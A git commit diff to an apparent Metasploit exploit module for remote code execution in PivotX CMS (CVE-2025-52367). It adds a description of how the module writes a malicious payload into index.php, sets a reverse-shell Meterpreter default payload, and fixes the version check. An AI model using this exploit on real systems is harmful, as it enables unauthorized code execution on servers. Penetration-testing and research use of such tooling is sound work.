Refactors code, adds description, fixes CVE

msutovsky-r7 · msutovsky-r7 · commit 75f6e6a74837 · 2025-07-22T16:24:35.000+02:00
diff --git a/modules/exploits/linux/http/pivotx_rce.rb b/modules/exploits/linux/http/pivotx_rce.rb
@@ -15,6 +15,7 @@ def initialize(info = {})
         info,
         'Name' => 'PivotX Remote Code Execution',
         'Description' => %q{
+          This module gains remote code execution in PivotX management system. The PivotX allows admin user to directly edit files on the webserver, including PHP files. The module exploits this by writing a malicious payload into `index.php` file, gaining remote code execution.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -24,7 +25,7 @@ def initialize(info = {})
         'References' => [
           [ 'EDB', '52361' ],
           [ 'URL', 'https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3'],
-          [ 'CVE', '2025–52367']
+          [ 'CVE', '2025-52367']
         ],
         'Targets' => [
           [
@@ -38,7 +39,6 @@ def initialize(info = {})
         'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' },
         'DisclosureDate' => '2025-07-10',
         'DefaultTarget' => 0,
-
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -65,13 +65,13 @@ def check
 
     html_body = res.get_html_document
 
-    return Exploit::CheckCode::Unknow, 'Could not find version element' unless html_body.search('em').find { |i| i.text =~ /PivotX - (\d.\d\d?.\d\d?-[a-z0-9]+)/ }
+    return Exploit::CheckCode::Unknown, 'Could not find version element' unless html_body.search('em').find { |i| i.text =~ /PivotX - (\d.\d\d?.\d\d?-[a-z0-9]+)/ }
 
     version = Rex::Version.new(Regexp.last_match(1))
 
-    return Exploit::CheckCode::Appears("Detected PivotX  #{version}") if version <= Rex::Version.new('3.0.0-rc3')
+    return Exploit::CheckCode::Appears, "Detected PivotX  #{version}" if version <= Rex::Version.new('3.0.0-rc3')
 
-    return Exploit::CheckCode::Safe("PivotX  #{version} is not vulnerable.")
+    return Exploit::CheckCode::Safe, "PivotX  #{version} is not vulnerable"
   end
 
   def login
